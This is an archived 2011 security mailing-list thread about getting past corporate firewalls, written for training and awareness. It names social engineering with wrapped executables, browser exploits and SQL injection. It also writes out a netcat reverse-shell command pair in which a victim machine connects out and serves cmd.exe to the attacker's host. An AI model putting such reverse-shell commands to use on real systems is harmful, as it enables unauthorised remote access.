Security Basics mailing list archives
FW: Re: Firewall question - how easy is it to get thru - Proof
From: "Rivest, Philippe" <PRivest () transforcecompany com>
Date: Mon, 28 Feb 2011 14:56:16 +0000
To conclude this post, I'd like to share my findings with everyone in a "resume".
First of all, thanks for everyone's answer I appreciate your help greatly.
So my initial question was "how hard & long would it take to attack directly a firewall to get to the SRV protected
behind it". You basically answered "don't do it".
You basically used "the easiest way" around the Firewall. I mean, why waste time on a door when the window is open? :P
Here's a list of solution/quick fix that you provided to me:
1. Social engineering (humans)
a. One of the posts showed me how to use the tool "elitewrap" that basically creates an
.exe that can play a video AND in the background execute something else (that's an example). The goal was to use Social
engineering and have a user execute the file, while obtaining a reverse shell (I'll discuss about this later).
2. Physical security
a. Again, getting in the environment of the company is usually quite easy
b. We put wireless in here because you need to be "near" the access point
3. Application issues
a. This was one of the most popular vectors of attack. You stated, and I researched on
this, that applications are weaker than OS and as such they should be attacked first. I found a report that showed that
MS Office held (more or less) 20 of the top 30 vulnerability in late 2009 while the 10 others were related to Sun Java
and Adobe.
b. Of course you mentioned SQL INJECTION attacks
c. Also I saw someone post about protection on web applications a "WAF" (web application
firewall, a deep inspection FW)
To sum it up, I get my answer in the format I didn't expect. The Firewall is "hard" to attack while "easy" to bypass
(with a potentially longer list!).
I tough that I knew how to use Netcat before I made this post, I was wrong. So just to help anyone looking "Reverse
Shell Netcat" on google, heres what I found (with the help of one of you)
My_PC
Netcat.exe -v -l -p 80
Victims PC
Netcat.exe IP_My_PC 80 -e cmd.exe
This will set "My PC" as the server (initially) listening on port 80 for ANY connexion. While we execute on the Victims
PC the netcat to connect on port 80 to MY_PC and upon connexion execute cmd.exe (locally). What will happen is that on
MY_PC you will get that CMD.EXE shell (the shell of the Victims PC). Thus bypassing the Firewall and getting the
privilege of the local user on the Victims PC.
Btw this is possible with SSH (encrypted so the firewall or sysadmin wont get the transmitted msg)
I hope this helps! I know many of you already knew how to do it, but I'm gonna try and give a little back :-)
Thanks again guys,
Phil
Important:
Please note that my new email address is privest () transforcecompany com
Please note that my new website address is http://www.transforcecompany.com
SVP Veuillez noter que ma nouvelle adresse courriel est privest () transforcecompany com
SVP Veuillez noter que ma nouvelle adresse web est http://www.transforcecompany.com
Philippe Rivest - CISA, CISSP, CEH, Network+, Server+, A+
TransForce Inc.
Internal auditor - Information security
Vérificateur interne - Sécurité de l'information
Linkedin: http://ca.linkedin.com/pub/philippe-rivest/20/19a/232
6600 Saint-François
Saint-Laurent (Quebec) H4S 1B7
Tel.: 514-331-4417
Fax: 514-856-7541
www.transforcecompany.com
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Rivest, Philippe
Sent: 17 février 2011 15:21
To: John Morrison
Cc: security-basics () securityfocus com
Subject: RE: Re: Firewall question - how easy is it to get thru - Proof
Well, yes.
I use 3 hacks, one of which is web based (IIS 5.0) which is old but works greats in classes to show it. I copy files,
get local admin, install services and end up with full domain admin privilege.
The 2 other hacks are made against the service (locally).
So with our without a firewall, I still can get everything done. I just dont put the firewall because when I travel I
already have a lot of equipment.
- For all those who are telling me IIS5.0 is old and obsolete... I know. Its only to show management how its made. I'm
not fully aware of all the new hacks :P
Why the question?
Important:
Please note that my new email address is privest () transforcecompany com
Please note that my new website address is http://www.transforcecompany.com
SVP Veuillez noter que ma nouvelle adresse courriel est privest () transforcecompany com
SVP Veuillez noter que ma nouvelle adresse web est http://www.transforcecompany.com
Philippe Rivest - CISA, CISSP, CEH, Network+, Server+, A+
TransForce Inc.
Internal auditor - Information security
Vérificateur interne - Sécurité de l'information
Linkedin: http://ca.linkedin.com/pub/philippe-rivest/20/19a/232
6600 Saint-François
Saint-Laurent (Quebec) H4S 1B7
Tel.: 514-331-4417
Fax: 514-856-7541
www.transforcecompany.com
-----Original Message-----
From: John Morrison [mailto:john.morrison101 () gmail com]
Sent: 17 février 2011 15:18
To: Rivest, Philippe
Cc: security-basics () securityfocus com
Subject: Re: Re: Firewall question - how easy is it to get thru - Proof
Phillipe,
Could you add a firewall to your seminar setup? And prove it works
through a firewall?
On 16 February 2011 19:23, Rivest, Philippe
<PRivest () transforcecompany com> wrote:
Thanks for the information, it is true that the easiest way to beat the firewall is to bypass it or use rules that allow the network transaction to occur, such as web browser attacks. On the Metasploit note, i have too add that Metasploit is a great tool :) In my current company i provide a hacking seminar of 3-4 hours and i show how to use Nessus & Metasploit together to perform 3 different hacks. 2 of which gives a reverse meterpreter shell. Everyone is surprised at how "easy" and "quick" it is once you identify the vulnerability. Thats one of the source of my initial question. I'm always challenged on "Well in your seminar you have no firewall"... It kinda bugs me that people put so much trust on that technology alone. Thats why i'd like to get information & papers that shows how easy it is to simply break/attack directly the firweall and (between you and i) own it. Important: Please note that my new email address is privest () transforcecompany com Please note that my new website address is http://www.transforcecompany.com SVP Veuillez noter que ma nouvelle adresse courriel est privest () transforcecompany com SVP Veuillez noter que ma nouvelle adresse web est http://www.transforcecompany.com Philippe Rivest - CISA, CISSP, CEH, Network+, Server+, A+ TransForce Inc. Internal auditor - Information security Vérificateur interne - Sécurité de l'information Linkedin: http://ca.linkedin.com/pub/philippe-rivest/20/19a/232 6600 Saint-François Saint-Laurent (Quebec) H4S 1B7 Tel.: 514-331-4417 Fax: 514-856-7541 www.transforcecompany.com -----Original Message----- From: Shane Anglin [mailto:shane.anglin () gmail com] Sent: 16 février 2011 14:19 To: security-basics () securityfocus com; Rivest, Philippe Subject: RE: Re: Firewall question - how easy is it to get thru - Proof Some detail on how such a think can occur. somehow, the 'bad guy' tricks a target LAN user to connect his web browser to the bad guy's web server/page (phishing, social engineering, etc). the requested web page maliciously loads some web browser exploit on the target LAN user's machine, and the exploit runs. The exploit could, for example, be one that simply opens up a session reversed back to bad guy's web server.. And now bad guy has a link inside the target LAN network via the target LAN machine to scan from, load more code onto target LAN machine, etc. and all happening along the HTTP(port 80) or HTTPS (port 443) that the target LAN user initiated, and occurring within the allowed firewall rules, demonstrating that firewall technology alone is not a magic pill . Metasploit is a great tool to perform such attacks. I suggest reading a bit on Metasploit's meterpreter reverse tcp basics. Regards, Shane Anglin Shane.Anglin () gmail com ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------ ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
Current thread:
- RE: Firewall question - how easy is it to get thru - Proof vedantamsekhar () gmail com (Feb 17)
- <Possible follow-ups>
- RE: Re: Firewall question - how easy is it to get thru - Proof Shane Anglin (Feb 17)
- RE: Re: Firewall question - how easy is it to get thru - Proof Rivest, Philippe (Feb 17)
- RE: Re: Firewall question - how easy is it to get thru - Proof Omar Salvador Alcalá Ruiz (Feb 18)
- Re: Re: Firewall question - how easy is it to get thru - Proof John Morrison (Feb 18)
- RE: Re: Firewall question - how easy is it to get thru - Proof Rivest, Philippe (Feb 18)
- Re: Re: Firewall question - how easy is it to get thru - Proof John Morrison (Feb 18)
- Windows Authentication Robert . Yung (Feb 22)
- RE: Re: Firewall question - how easy is it to get thru - Proof Rivest, Philippe (Feb 17)